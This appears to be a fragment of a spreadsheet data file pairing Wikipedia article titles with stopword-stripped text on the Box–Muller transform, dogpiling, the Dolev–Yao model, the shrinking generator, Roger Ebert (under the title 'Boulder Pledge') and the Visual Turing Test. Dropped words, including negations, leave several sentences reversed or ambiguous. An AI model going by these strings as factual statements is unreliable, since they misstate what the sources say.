deviates) mean standard deviation implementation standard generates values normal distribution mean {\displaystyle variance {\displaystyle \sigma ^{2}} {\displaystyle standard normal deviate, {\displaystyle x=z\sigma +\mu normal distribution mean {\displaystyle standard deviation {\displaystyle \sigma note random number generator seeded ensure new, pseudo-random values returned sequential calls generategaussiannoise function. also inverse transform sampling marsaglia polar method, similar transform box–muller, uses cartesian coordinates, instead polar coordinates references howes, lee; thomas, david (2008). gems efficient random number generation application using cuda. pearson education, inc. isbn 978-0-321-51526-1. external links weisstein, eric "box-muller transformation". mathworld. convert uniform distribution gaussian distribution code)</t>
  </si>
  <si>
    <t>Dogpiling (Internet)</t>
  </si>
  <si>
    <t>dog-piling, dog-pile form online harassment online abuse. examples online abuse include flaming, doxing (online release personal information without consent), impersonation, public shaming. dog-pilers often focus harassing, exposing, punishing target opinion group agree with, simply sake bully targeting victim. participants criticism and/or insults target single person. definitions, also includes sending private messages. history today, dog-pile popular terms internet form online harassment. example, term dog-piling used reference gamergate harassment campaign. also online shaming flaming (internet) internet troll bandwagon effect mental health cyberbullying gamergate references</t>
  </si>
  <si>
    <t>Dolev–Yao model</t>
  </si>
  <si>
    <t>dolev–yao model, named authors danny dolev andrew yao, formal model used prove properties interactive cryptographic protocols. network network represented abstract machines exchange messages. these messages consist formal terms. these terms reveal internal structure messages, parts hopefully remain opaque adversary. adversary adversary model overhear, intercept, synthesize message limited constraints cryptographic methods used. words: "the attacker carries message." this omnipotence difficult model, many threat models simplify done attacker ubiquitous computing. algebraic model cryptographic primitives modeled abstract operators. example, asymmetric encryption user {\displaystyle represented encryption function {\displaystyle e_{x}} decryption function {\displaystyle d_{x}} their main properties composition identity function {\displaystyle d_{x}e_{x}=e_{x}d_{x}=1} encrypted message {\displaystyle e_{x}(m)} reveals nothing {\displaystyle unlike real world, adversary neither manipulate encryption's representation guess key. attacker may, however, re-use messages sent therefore become known. attacker encrypt decrypt keys knows, forge subsequent messages. protocol modeled sequential runs, alternating queries (sending message network) responses (obtaining message network). remark symbolic nature dolev–yao model makes manageable computational models accessible algebraic methods potentially less realistic. however, kinds models cryptographic protocols related. also, symbolic models well suited show protocol broken, rather secure, given assumptions attackers capabilities. also security cryptographic protocol references</t>
  </si>
  <si>
    <t>Shrinking generator</t>
  </si>
  <si>
    <t>cryptography, shrinking generator form pseudorandom number generator intended used stream cipher. published crypto 1993 coppersmith, hugo krawczyk, yishay mansour.the shrinking generator uses linear-feedback shift registers. one, called sequence, generates output bits, other, called sequence, controls output. both clocked; output; discarded, nothing output, registers clocked again. this disadvantage generator's output rate varies irregularly, hints state problem overcome buffering output. random sequence generated lfsr guarantee unpredictability secure system various methods proposed improve randomness despite simplicity, currently known attacks better exhaustive search feedback polynomials secret. feedback polynomials known, however, best known attack requires less bits output.a variant self-shrinking generator. implementation python this example uses galois lfrss produce output pseudorandom bitstream. python code used encrypt decrypt file bytestream. also fish, (insecure) stream cipher based shrinking generator principle alternating step generator, similar stream cipher references</t>
  </si>
  <si>
    <t>Boulder Pledge</t>
  </si>
  <si>
    <t>roger joseph ebert june 1942 april 2013) american film critic, film historian, journalist, screenwriter, author. film critic chicago sun-times 1967 death 2013. 1975, ebert became first film critic pulitzer prize criticism. neil steinberg chicago sun-times said ebert "was without question nation's prominent influential film critic," kenneth turan angeles times called "the best-known film critic america."ebert known intimate, midwestern writing voice critical views informed values populism humanism. writing prose style intended entertaining direct, made sophisticated cinematic analytical ideas accessible nonspecialist audiences. while populist, ebert frequently endorsed foreign independent films believed would appreciated mainstream viewers, often resulted films receiving greater exposure.ebert chicago tribune critic gene siskel helped popularize nationally televised film reviewing co-hosted show sneak previews, followed several variously named movies programs. verbally sparred traded humorous barbs discussing films. they created trademarked phrase "two thumbs up," used gave film positive review. after siskel died 1999, ebert continued hosting show various co-hosts then, starting 2000, richard roeper. ebert diagnosed cancer thyroid salivary glands 2002. required treatment included removing section lower 2006, leaving severely disfigured unable speak normally. however, ability write remained unimpaired continued publish frequently online print death april 2013. rogerebert.com website, launched 2002 originally underwritten chicago sun-times, remains online archive published writings reviews also hosting material written group critics selected ebert death. early life roger joseph ebert born urbana, illinois, child annabel (née stumm, 1911–1987), bookkeeper, walter harry ebert (1901–1960), electrician. raised roman catholic, attending mary's elementary school serving altar urbana.his paternal grandparents german immigrants maternal ancestry irish dutch. ebert's interest journalism began student urbana high school, sportswriter news-gazette champaign, illinois; however, began writing career letters comment science-fiction fanzines era. senior year, class president co-editor high school newspaper, echo. 1958, illinois high school association state speech championship "radio speaking," event simulates radio newscasts. regarding early influences film criticism, ebert wrote 1998 parody collection about movies:i learned movie critic reading magazine mad's parodies made aware machine inside skin movie might look original outside, inside recycling dumb formulas. read magazine, plundered clues universe. pauline kael lost movies; lost magazine. ebert began taking classes university illinois urbana–champaign early-entrance student, completing high school courses also taking first university class. after graduating urbana high school 1960, ebert attended received undergraduate degree 1964. while university illinois, ebert worked reporter daily illini served editor senior year also continuing work reporter news-gazette champaign-urbana, illinois. begun news-gazette covering urbana high school sports.) undergraduate, member delta theta fraternity president u.s. student press association. first movie reviews ever wrote review dolce vita, published daily illini october 1961.ebert spent semester master's student department english attending university cape town rotary fellowship year. returned cape town graduate studies illinois semesters then, accepted student university chicago, prepared move chicago. needed support worked doctorate applied chicago daily news, hoping that, already sold freelance pieces daily news, including article death writer brendan behan, would hired editor herman kogan. instead, kogan referred ebert city editor chicago sun-times, hoge, hired ebert reporter feature writer sun-times 1966. attended doctoral classes university chicago working general reporter sun-times year. after movie critic eleanor keane left sun-times april 1967, editor robert zonka gave ebert. load graduate school film critic proved much, ebert left university chicago focus energies film criticism. career writing ebert began career film critic 1967, writing chicago sun-times. that year, film critic pauline kael first time york film festival. after sent columns, told "the best film criticism done american newspapers today." that year, ebert's first book, history university illinois titled illini century: hundred years campus life, published university's press. 1969, review night living dead published reader's digest. ebert first critics champion bonnie clyde, calling milestone history american movies, work truth brilliance. also pitilessly cruel, filled sympathy, nauseating, funny, heartbreaking astonishingly beautiful. seem words strung together, perhaps movies often reflect full range human life." years later, he'd call bonnie clyde "the first masterpiece job. felt exhilaration beyond describing. suspect long would experiences, least learned possible." wrote martin scorsese's first review, who's that knocking door?, predicted young director could become american fellini." addition film, ebert would occasionally write topics sun-times, music; 1970, ebert wrote first published concert review singer-songwriter john prine, time working mailman performing chicago folk clubs. ebert co-wrote screenplay russ meyer film beyond valley dolls (1970) sometimes joked responsible film, poorly received release become cult film. ebert meyer also made (1976), beneath valley ultra-vixens (1979), films, involved ill-fated pistols movie killed bambi? april 2010, ebert posted screenplay killed bambi?, anarchy blog.)beginning 1968, ebert worked university chicago adjunct lecturer, teaching night class film graham school continuing liberal professional studies.in 1975, ebert received pulitzer prize criticism.in october 1986, continuing work sun-times still based chicago, ebert replaced reed york post chief film reviewer.as 2007, reviews syndicated newspapers united states abroad. ebert also published books dozens collected reviews. even used (and later internet) share reviews, ebert continued write chicago sun-times died 2013. siskel ebert also 1975, ebert gene siskel began co-hosting weekly film-review television show, sneak previews, locally produced chicago public broadcasting station wttw. series later picked national syndication pbs. became well known "thumbs up/thumbs down" review summaries. siskel ebert trademarked phrase "two thumbs up."in 1982, moved launch similar syndicated commercial television show named movies with gene siskel roger ebert. 1986, moved show ownership, creating siskel ebert movies buena vista television, part walt disney company.after siskel died 1999, producers retitled show roger ebert movies used rotating co-hosts including martin scorsese, a.o. scott, janet maslin.in september 2000, chicago sun-times columnist richard roeper became permanent co-host show renamed movies ebert roeper later movies.in 2000, ebert interviewed president bill clinton white house. clinton spoke love movies, favorite films 1999, favorite films time, casablanca (1942), high noon (1952) commandments (1956). clinton also mentioned favorite actors meryl streep, robert niro, hanks.in 2005, ebert became first film critic receive star hollywood walk fame. later career ebert ended association disney-owned movies july 2008, studio indicated wished take program direction. february 2009, ebert reported roeper would soon announce movie-review program, reiterated plan disney announced program's last episode would august 2010.on january 2009, ebert made honorary life member directors guild america. final television series, ebert presents: movies, premiered january 2011, ebert contributing review voiced bill kurtis brief segment called "roger's office," well featuring traditional film reviews movies" format presented christy lemire ignatiy vishnevetsky. program lasted season, cancelled funding constraints subsequent death ebert.the last review ebert published lifetime film host, published march 2013. last review ebert wrote film wonder, gave stars review chicago sun-times. posthumously published april 2013. july 2013, previously unpublished review film computer chess appeared ebert's website. review written march remained unpublished film's wide-release date. matt zoller seitz, editor ebert's website, confirmed unpublished reviews would eventually uploaded website. second review, spectacular now, published august 2013. film appearances ebert, along gene siskel, known many appearances late night talk shows including appearances late show david letterman sixteen times tonight show starring johnny carson fifteen times. they also appeared together oprah winfrey show, arsenio hall show, howard stern, tonight show leno, late night conan o'brien. 1982, 1983, 1985, ebert, along siskel, appeared saturday night live. first appearances, reviewed sketches night's telecast reviewed sketches "snl film festival" last appearance.in 1991, ebert, along siskel, appeared segment children's television series sesame street entitled "sneak peak previews" parody sneak previews). segment, critics instruct hosts oscar grouch telly monster thumbs up/thumbs rating system works. oscar asks could thumbs sideways ratings, goads argument whether would acceptable, ebert likes idea, siskel not. also seen year show's celebrity version "monster mirror". 2004, ebert appeared sesame street franchise's direct-to-video special celebration grover, delivering review monsterpiece theater segment "the king i".in 1995, ebert, along colleague gene siskel, guest-starred episode animated series critic. episode, siskel ebert split wants protagonist sherman, fellow movie critic, partner. episode parody film sleepless seattle. following year, ebert appeared pitch, documentary canadian film makers spencer rice kenny hotz. made appearance 1997 episode television series early edition, took place chicago. episode, ebert consoles young depressed sees character called bosco bunny movie.in 1999, roger ebert founded film festival, ebertfest, home town champaign, illinois. also regular fixture hawaii international film festival. 2003, ebert made cameo appearance film abby singer. 2010, ebert announced international academy digital arts sciences webby person year, taken internet following battle cancer. october 2010, ebert appeared camera robert osborne turner classic movies network network's "the essentials" series. ebert chose films sweet smell success lady shown.for many years, academy awards ceremony, ebert appeared roeper live pre-awards show, evening academy awards: arrivals. this aired decade, usually prior awards ceremony show, also featured carpet interviews fashion commentary. they also used appear post-awards show entitled evening academy awards: winners, produced aired abc-owned kabc-tv angeles.ebert principal critics featured gerald peary's 2009 documentary film love movies: story american film criticism. shown discussing dynamics appearing gene siskel 1970s show coming theatre near you, predecessor sneak previews chicago station wttw. also expressed approval proliferation young people writing film reviews today internet.ebert provided audio commentaries several films, including citizen kane, casablanca, dark city, floating weeds, crumb, beyond valley dolls (for ebert also wrote screenplay, based story co-wrote russ meyer). ebert also interviewed central park media extra feature release anime film grave fireflies. bio-documentary ebert, called life itself, released 2014 universal acclaim.though making personal appearance, honorary effigy ebert co-starred 1998 reimagined version godzilla, played actor michael lerner york city mayor ebert. critical style ebert described critical approach films "relative, absolute"; reviewed film thought would prospective audience, always least consideration value whole. awarded four stars films highest quality, generally half star lowest, unless considered film example, death wish "artistically inept morally repugnant," case received stars. when friend hellboy good, asking good compared mystic river, asking good compared punisher. answer would scale four, superman four, hellboy three punisher two. way, american beauty gets four stars, united states leland clocks two. metacritic later noted ebert tended give lenient ratings critics. average film rating 71%, translated percentage, compared site whole. reviews, positive ratings better colleagues. ebert acknowledged 2008 gave higher ratings average critics, though said part considered rating stars general threshold film "thumbs up." although ebert rarely wrote outright-scathing reviews, reputation writing memorable ones films really disliked, north.ebert emphasized star ratings little meaning considered context review itself. occasionally, ebert's star rating seemed odds written opinion. ebert acknowledged case review basic instinct gave stars, wrote cannot recommend movie, hell can't just godawful? what kind reason staying away movie? godawful boring, would reason." review manson family, ebert gave film three stars achieving admitted count recommendation similarly gave adam sandler–starring remake longest yard positive rating three stars, review, wrote soon attending cannes film festival, recommended readers film access satisfying cinematic experiences. declined give star rating human centipede, arguing rating system "unsuited" film: movie good? bad? does matter? occupies world stars shine."ebert's reviews also characterized called "dry wit." august 2005, schneider insulted angeles times movie critic patrick goldstein (who criticized schneider's film deuce bigalow: european gigolo) commenting goldstein unqualified never pulitzer prize, ebert intervened stating that, pulitzer winner, qualified review film, bluntly told schneider, "your movie sucks." ebert schneider would later reconcile regarding matter.ebert often included personal anecdotes reviews considered relevant. occasionally wrote reviews forms stories, poems, songs, scripts, open letters, imagined conversations. wrote many essays articles exploring depth field film criticism. will sloan argued reason ebert's popularity struck balance respected among film scholars appealing wide audience. example, noted ebert siskel given "thumbs up/thumbs down" verdicts show, also used show promote foreign independent cinema.alex ross, music critic yorker, wrote ebert influenced writing: noticed much ebert could across limited space. didn’t waste time clearing throat. 'they meet first time front yard practicing baton-twirling,' begins review badlands. often, managed smuggle basics plot larger thesis movie, don’t notice exposition taking place: broadcast news knowledgeable news-gathering process movie ever made, also insights personal matter people high-pressure jobs avoiding time alone themselves.' reviews start different ways, sometimes personal confessions, sometimes sweeping statements. another, pulls when feels strongly, bang fist impressive way. review apocalypse ends thus: 'the whole huge grand mystery world, terrible, beautiful, seems hang balance.'in appearances howard stern show, frequently challenged defend ratings. ebert stood opinions notable exception: stern pointed ebert given godfather part three-star rating 1974, subsequently given godfather part three half stars. ebert later added godfather part "great movies" list october 2008 stating original review often cited proof "worthlessness" still changed mind would change word original review. when reviewing 2009 remake last house left, ebert noted given controversial 1972 original three half stars declined make comparison versions: wrote original 'last house' review years ago. person. uninterested 'consistent'." preferences favorites essay looking back first twenty-five years film critic, ebert writes make generalization, would many favorite movies good people... casablanca people right thing. third people right thing never speak another result... good movies good people. also like movies people sense humor. orson welles, play either good people third man, winning way, witty dialogue, scene almost forgive crimes. movies love, simply physical movement. when gene kelly splashes singin' rain, judy garland follows yellow brick road, fred astaire dances ceiling, john wayne puts reins teeth gallops across mountain meadow, purity cannot resisted. equinox flower, japanese film master yasujiro ozu, sequence shots: room teapot foreground. another view room. mother folding clothes. shot corridor mother crossing angle, daughter crossing back. reverse shot hallway arriving father greeted mother daughter. shot father leaves frame, mother, daughter. shot mother father enter room, background daughter picks leaves frame. this sequence timed movement cutting perfect music ever written, dance, poem."ebert argued aesthetic values black-and-white photography colorization: "black-and-white movies present deliberate absence color. this makes less realistic color films (for real world color). they dreamlike, pure, composed shapes forms movements light shadow. color films simply illuminated. black-and-white films lighted...black white legitimate beautiful artistic choice motion pictures, creating feelings effects cannot obtained way." championed animation, particularly films hayao miyazaki. review princess mononoke, wrote: movies many reasons. here them. want wondrous sights available real world, stories myth dreams free play. animation opens possibility, freed gravity chains possible. realistic films show physical world; animation shows essence. animated films copies 'real movies,' shadows reality, create existence right." concluded review ratatouille writing: "every time animated film successful, read animation 'just children' 'for whole family,' 'even adults going own.' kidding!" ebert indicated favorite film citizen kane, joking, "that's official answer," although preferred emphasize "the important" film. insinuated real favorite film dolce vita. said seeing third cemented love cinema: "this movie altar love cinema. first time little fleabox theater left bank paris, 1962, first trip europe. sad, beautiful, romantic, became part memories happened me." favorite actor robert mitchum, favorite actress ingrid bergman. also considered buster keaton, yasujiro ozu, robert altman, werner herzog, martin scorsese favorite directors. expressed general distaste "top-10" lists, movie lists general, contributed top-10 list 2012 sight sound critics' poll. listed alphabetically, films 2001: space odyssey; aguirre, wrath god; apocalypse now; citizen kane; dolce vita; general; raging bull; tokyo story; tree life; vertigo. favorite bond film goldfinger (1964), later added "great movies" list. best films year ebert compiled "best year" movie lists beginning 1967 2012, thereby helping provide overview critical preferences. choices were: ebert revisited sometimes revised opinions. after ranking e.t. extra-terrestrial third 1982 list, movie year appear later "best films 1980s" list (where also ranked third). made similar reevaluations raiders lost (1981) (1985). three colours trilogy (blue (1993), white (1994), (also 1994)), pulp fiction (1994) originally ranked second third ebert's 1994 list; included "best films 1990s" list, order reversed.in 2006, ebert noted "tendency place consider year's best film second place, perhaps trying make kind point pick," adding, 1968, ranked 2001 battle algiers. 1971, mccabe mrs. miller better last picture show. 1974, chinatown probably better, different way, scenes marriage. 1976, could rank small change taxi driver? 1978, would days heaven unmarried woman. 1980, course, raging bull better film black stallion although later chose raging bull best film entire decade 1980s, second-best film 1980 person 1968, 1971, 1980? hope not." since ebert died, website continued practice, site's primary contributors offering individual top-10 lists, rankings combined communal top-10 list. genres content ebert often critical motion picture association america film rating system (mpaa). main arguments strict profanity, lenient violence, secretive guidelines, inconsistent applying willing consider wider context meaning film. advocated replacing nc-17 rating separate ratings pornographic nonpornographic adult films.ebert also frequently lamented cinemas outside major cities "booked computer hollywood regard local tastes," making high-quality independent foreign films virtually unavailable american moviegoers.some horror movie fans accused ebert elitism prejudice horror genre, especially dismissive comments "dead teenager movies." 2007, ebert responded question horror movie reviewer saying disparage horror movies whole. wrote drew distinction films like nosferatu silence lambs, regarded "masterpieces," content teenagers killed. review exorcist, wrote "i’ve always preferred generic approach film criticism; good movie type. exorcist best movies type ever made."ebert occasionally accused films unwholesome political agenda, assertion film dirty harry (1971) fascist moral position. wary films passed art, lurid sensational. leveled charge films night porter (1974).ebert commented films using catholic upbringing point reference, critical films believed grossly ignorant insulting catholicism, stigmata (1999) priest (1994). also gave favorable reviews controversial films themes references jesus christ catholicism, including passion christ (2004), last temptation christ (1988), kevin smith's religious satire dogma (1999). ebert described agnostic 2005, preferred "pigeon-holed". contrarian reviews writing online magazine hazlitt ebert's reviews, will sloan argued "[t]here inevitably movies veered consensus, provocative idiosyncratic nature." examples ebert dissenting critics include negative reviews celebrated films blue velvet ("marred sophomoric satire cheap shots"), clockwork orange paranoid right-wing fantasy masquerading orwellian warning"), usual suspects ("to degree understand, care").he also gave one-star review critically acclaimed abbas kiarostami film taste cherry, palme d'or 1997 cannes film festival. ebert later went film list most-hated movies time. dismissive 1988 bruce willis action film hard ("inappropriate wrongheaded interruptions reveal fragile nature plot"), positive stars review 1997's speed cruise control ("movies like embrace goofiness almost sensual pleasure") three positive reviews accounting film's approval rating reviewer aggregator website rotten tomatoes (one others written movies co-star gene siskel). other interests ebert admirer director werner herzog, supported many years herzog's popularity declined. conducted onstage public "conversation" herzog telluride film festival 2004, screening herzog's film invincible roger ebert's overlooked film festival. herzog dedicated film encounters world (2008) ebert, ebert responded heartfelt public letter gratitude. herzog said exhorted ebert watch television reality sitcom anna nicole show, featuring former playboy playmate, could gain better understanding decline american culture. ebert watch it.ebert also advocate supporter asian-american cinema, famously coming defense cast crew justin lin's better luck tomorrow (2002) sundance film festival screening white member audience asked asians could portrayed negative light film empty amoral could made asian-americans americans. ebert responded "nobody would thing bunch white filmmakers: could 'your people'? asian-american characters right whoever hell want they represent 'their people'!" supporter film incident sundance, also supported number asian-american films, also screen film festival (such eric byler's charlotte sometimes). views technology ebert strong advocate maxivision movie projector runs frames second, compared usual frames second. opposed practice whereby theaters lower intensity projector bulbs order extend life bulb, arguing little effect make film harder see. ebert skeptical resurgence effects film, found unrealistic distracting.in 2005, ebert opined video games art, inferior media created authorial control, film literature, stating, "video games elegant, subtle, sophisticated, challenging visually wonderful," "the nature medium prevents moving beyond craftsmanship stature art." this resulted negative reaction video game enthusiasts, writer clive barker, defended video games form. ebert wrote piece response barker. ebert maintained position 2010, conceded expressed skepticism without familiar actual experience playing them. admitted barely played video games: played cosmology kyoto enormously enjoyed, myst lacked patience." personal life marriage ebert married trial attorney charlie "chaz" hammelsmith (formerly chaz hammel-smith) 1992. explained memoir, life itself, want marry mother died, afraid displeasing her. july 2012 blog entry titled "roger loves chaz," ebert wrote, "she fills horizon, great fact life, love, saved fate living life alone, seemed heading." chaz ebert became vice president ebert company emceed ebertfest. alcoholism recovery ebert recovering alcoholic, quit drinking 1979. member alcoholics anonymous written blog entries subject. ebert dated oprah winfrey longtime friend hers. winfrey credited persuading syndicate oprah winfrey show, became highest-rated talk show american television history. also friends film historian critic leonard maltin, considered book leonard maltin's movie video guide (final update 2014) standard film guide books. politics supporter democratic party, ebert publicly urged leftist filmmaker michael moore give politically charged acceptance speech academy awards: "i'd like michael moore barrels really loose give real rabble-rousing speech." during 1996 panel university colorado boulder's conference world affairs, ebert coined boulder pledge, vowed never purchase anything offered result unsolicited email message, forward chain emails mass emails others. ebert endorsed barack obama re-election president 2012, citing affordable care important reason support obama. beliefs ebert critical intelligent design, stated people believe either creationism beliefs crystal healing astrology qualified president. ebert also expressed disbelief pseudoscientific supernatural claims general, calling "woo-woo," though argued reincarnation possible "scientific, rationalist point view."discussing beliefs, 2009, ebert wrote "want provide category people apply [him]" "would want [his] convictions reduced word," stated, never said, although readers freely informed atheist, agnostic, least secular humanist am." blog entry, also said believer, atheist, agnostic. still awake night, asking how? content question would answer." march 2013, wrote: support freedom choice. choice support abortion, except cases clear-cut choice lives mother child. child conceived incest rape innocent deserves right born." also stated: consider catholic, lock, stock, barrel, technical loophole: cannot believe god. refuse call atheist, however, indicates great certainty unknowable". previously identified catholic reviews movies jesus, notably review gibson's passion christ.he wrote that: believe all, according abilities, done something make others little happier, something make little happier, best make others less happy crime. make unhappy crime starts. must contribute world. that true matter problems, health, circumstances. must try. always know this, happy lived long enough find out."on april 2011, achieved long-time goals: winning weekly cartoon-caption contests yorker attempts. health early 2002, ebert diagnosed papillary thyroid cancer successfully removed february. 2003, underwent surgery cancer salivary gland, followed radiation therapy. diagnosed cancer 2006. june year, surgery remove cancerous tissue near right jaw. week later life-threatening complication carotid artery burst near surgery site. confined rest unable speak, eat, drink time, necessitating feeding tube.the complications kept ebert extended period. ebert made first public appearance since mid-2006 ebertfest april 2007. unable speak, instead communicating wife. returned reviewing 2007, three reviews published print. july 2007, revealed still unable speak. ebert adopted computerized voice system communicate, eventually using copy voice created recordings cereproc. march 2010, health trials computerized voice featured oprah winfrey show. ebert later proposed test determine realism synthesized voice.ebert underwent surgery january 2008 restore voice address complications previous surgeries. april ebert announced speech restored. surgery performed april 2008 ebert fractured fall. 2011, ebert using prosthetic chin hide damage done many chin, mouth, throat surgeries.in december 2012, ebert hospitalized fractured hip, subsequently determined result cancer. death four years death, ebert wrote: know coming, fear believe nothing side death fear. hope spared much pain possible approach path. perfectly content born, think death state. what grateful gift intelligence, life, love, wonder, laughter. can't interesting. lifetime's memories brought home trip. require eternity little souvenir eiffel tower brought home paris. april 2013, ebert died hospital chicago, shortly return home enter hospice care. reaction came celebrities entertainment industry. then-president barack obama wrote, "roger movies could capture] unique power movies take somewhere magical. movies without roger." steven spielberg stated ebert's "reviews went deeper simply thumbs thumbs down. wrote passion real knowledge film film history, helped many movies find audiences. [he] television criticism map." martin scorsese released statement saying, "the death roger ebert incalculable loss movie culture film criticism. loss personally professional distance could talk much freely could critics. really, roger friend. it's simple." robert redford called ebert "one great champions freedom artistic expression" said, "his personal passion cinema boundless, sure legacy generations come." christopher nolan said ebert, never became jaded… even bringing thoughtful critical eye."hundreds people attended funeral mass held chicago's holy name cathedral april 2013, ebert celebrated film critic, newspaperman, advocate social justice, husband. father michael pfleger concluded service "the balconies heaven filled angels singing 'thumbs memorials legacy 45min public tribute, entitled roger ebert: celebration life, held april 2013, chicago theatre. featured in-person remembrances, video testimonials, video film clips, gospel choirs, was, according chicago tribune's mark caro, laughter- sorrow-filled send-off entertainment media worlds."in september 2013, organizers champaign, illinois, announced plans raise $125,000 build life-size bronze statue ebert town, unveiled front virginia theatre ebertfest april 2014. composition selected widow, chaz ebert, depicts ebert sitting middle three theater seats giving "thumbs up."the 2013 toronto international film festival opened video tribute ebert thomson hall world premiere wikileaks-based film fifth estate. ebert avid supporter festival since inception 1970s. chaz attendance accept plaque roger's behalf.at 86th academy awards ceremony, ebert included memoriam montage, rare honor film critic.in 2014, documentary life itself released. director steve james, whose films widely advocated ebert, started making ebert still alive. martin scorsese served executive producer. film studies ebert's life career, also filming ebert final months, includes interviews family friends. universally praised critics. approval rating rotten tomatoes.werner herzog told entertainment weekly ebert soldier cinema": always loved roger good soldier, good soldier cinema, wounded soldier years affliction held plowed soldiered held outpost given almost everyone: monumental shift intelligent, deep discourse cinema something vanishing last maybe decades...i've always tried good soldier cinema myself, course since he’s gone, plow plowed life, roger looking shoulder. gonna disappoint him.”ebert inducted laureate lincoln academy illinois. 2001, awarded highest honor illinois, order lincoln, governor illinois area performing arts. 2016, ebert inducted chicago literary hall fame.the website rogerebert.com contains archive every review ebert wrote, well many essays opinion pieces. site, operated ebert digital partnership chaz friend josh golden), continues publish material written group critics selected ebert death. awards honors ebert received many awards long distinguished career film critic television host. first film critic ever pulitzer prize, receiving pulitzer prize criticism 1975 working chicago sun-times, "for film criticism 1974". 2003, ebert honored american societ</t>
  </si>
  <si>
    <t>Visual Turing Test</t>
  </si>
  <si>
    <t>computer vision research driven standard evaluation practices. current systems tested accuracy tasks like object detection, segmentation localization. methods like convolutional neural networks seem pretty well tasks, current systems still close solving ultimate problem understanding images humans motivated ability humans understand image even tell story geman introduced visual turing test computer vision systems. described operator-assisted device produces stochastic sequence binary questions given test image”. query engine produces sequence questions unpredictable answers given history questions. test vision require natural language processing. human operator provide correct answer question reject ambiguous. query generator produces questions follow “natural story line”, similar humans look picture. history research computer vision dates back 1960s seymour papert first attempted solve problem. this unsuccessful attempt referred summer vision project. reason successful computer vision complicated people think. complexity alignment human visual system. roughly human brain devoted processing vision, clearly indicates difficult problem. later attempts solve problems models inspired human brain. perceptrons frank rosenblatt, form neural networks, first approaches. these simple neural networks could live expectations certain limitations considered future research. later availability hardware processing power research shifted image processing involves pixel-level operations, like finding edges, de-noising images applying filters name few. there great progress field problem vision make machines understand images still addressed. during time neural networks also resurfaced shown limitations perceptrons overcome multi-layer perceptrons. also early 1990s convolutional neural networks born showed great results digit recognition scale well harder problems. late 1990s early 2000s birth modern computer vision. reasons happened availability key, feature extraction representation algorithms. features along already present machine learning algorithms used detect, localise segment objects images. while advancements made, community felt need standardised datasets evaluation metrics performances compared. this emergence challenges like pascal challenge imagenet challenge. availability standard evaluation metrics open challenges gave directions research. better algorithms introduced specific tasks like object detection classification. visual turing test aims give direction computer vision research would lead introduction systems step closer understanding images humans current evaluation practices large number datasets annotated generalised benchmark performances difference classes algorithms assess different vision tasks (e.g., object detection/recognition) image domain (e.g., scene images). famous datasets computer vision imagenet used assess problem object level image classification. imagenet largest annotated datasets available million images. important vision task object detection localisation refers detecting object instance image providing bounding coordinates around object instance segmenting object. popular dataset task pascal dataset. similarly datasets specific tasks like dataset human pose detection, core dataset evaluate quality detected object attributes colour, orientation, activity. having standard datasets helped vision community come extremely well performing algorithms tasks. next logical step create larger task encompassing smaller subtasks. having task would lead building systems would understand images, understanding images would inherently involve detecting objects, localising segmenting them. details visual turing test (vtt) unlike turing test query engine system interrogates computer vision system presence human co-ordinator. system generates random sequence binary questions specific test image, answer question unpredictable given true answers previous questions (also known history questions). test happens presence human operator serves main purposes: removing ambiguous questions providing correct answers unambiguous questions. given image infinite possible binary questions asked bound ambiguous. these questions generated query engine removed human moderator instead query engine generates another question answer unpredictable given history questions. visual turing test evaluate image understanding computer system, important part image understanding story line image. when humans look image, think pixels left pixels top, instead look story, e.g. might think parked road, person exiting heading towards building. important elements story line objects extract story line image first important task instantiate objects query engine does. query engine query engine core visual turing test comprises main parts vocabulary questions vocabulary vocabulary words represent elements images. this vocabulary used appropriate grammar leads questions. grammar defined next section leads space binary questions. vocabulary {\displaystyle {\mathcal {v}}} consist three components: types objects {\displaystyle {\mathcal {t}}} type-dependent attributes objects {\displaystyle {\mathcal {a}}(t)} type-dependent relationships objects {\displaystyle {\mathcal {r}}(t,t')} images urban street scenes types objects include people, vehicle buildings. attributes refer properties objects, e.g. female, child, wearing carrying something, people moving, parked, stopped, tire visible tires visible vehicles. relationships pair object classes either “ordered” “unordered”. unordered relationships include talking, walking together ordered relationships include taller, closer camera, occluding, occluded etc. additionally vocabulary used context rectangular image regions allow localisation objects image. extremely large number regions possible complicates problem, test, regions specific scales used include 1/16 size image, size image, size image larger. questions question space composed four types questions: existence questions: existence questions find objects image uniquely identified previously. they form :qexist instance object type attributes partially visible region previously instantiated?' uniqueness questions: uniqueness question tries uniquely identify object instantiate it.quniq unique instance object type attributes partially visible region previously instantiated?' uniqueness questions along existence questions form instantiation questions. mentioned earlier instantiating objects leads interesting questions eventually story line. uniqueness questions follow existence questions positive answer leads instantiation object. attribute questions: attribute question tries find object instantiated. such questions query single attribute, conjunction attributes disjunction attributes.qatt(ot) {'does object attribute 'does object attribute attribute a2?' 'does object attribute attribute a2?'} relationship questions: once multiple objects instantiated, relationship question explores relationship pairs objects.qrel(ot,ot') 'does object relationship object ot'?' implementation details mentioned core visual turing test query generator generates sequence binary questions answer question unpredictable given correct answers previous questions. this recursive process, given history questions correct answers, query generator either stops unpredictable questions, randomly selects unpredictable question adds history. question space defined earlier implicitly imposes constraint flow questions. make clear means attribute relationship questions precede instantiation questions. only objects instantiated, queried attributes relations previously instantiated objects. thus given history restrict possible questions follow questions referred candidate questions {\displaystyle q_{\text{can}}} task choose unpredictable question candidate questions conforms question flow describe next section. this, find unpredictability every question among candidate questions. {\displaystyle binary random variable, {\displaystyle h(i)=1} history {\displaystyle valid image {\displaystyle {\displaystyle otherwise. {\displaystyle q\in proposed question, {\displaystyle x_{q}} answer question {\displaystyle then, find conditional probability getting answer question given history {\displaystyle p_{h}(x_{q}=x)={\frac {p\{i:h(i)=1,x_{q}(i)=x\}}{p\{i:h(i)=1\}}}} given probability measure unpredictability given {\displaystyle \rho _{h}(q)=|p_{h}(x_{q}=1)-0.5|} closer {\displaystyle \rho _{h}(q)} unpredictable question {\displaystyle \rho _{h}(q)} every question calculated. questions {\displaystyle \rho _{h}(q)&lt;\epsilon almost unpredictable questions next question randomly picked these. question flow discussed previous section implicit ordering question space, according attribute questions come instantiation questions relationship questions come attribute questions, multiple objects instantiated. therefore, query engine follows loop structure first instantiates object existence uniqueness questions, queries attributes, relationship questions asked object previously instantiated objects. look-ahead search clear interesting questions attributes relations come instantiation questions, query generator aims instantiating many objects possible. instantiation questions composed existence uniqueness questions, uniqueness questions actually instantiate object positive response. query generator randomly pick instantiation question, prefers pick unpredictable uniqueness question present. question present, query generator picks existence question lead uniqueness question high probability future. thus query generator performs look-ahead search case. story line integral part ultimate building systems understand images humans story line. humans figure story line image see. query 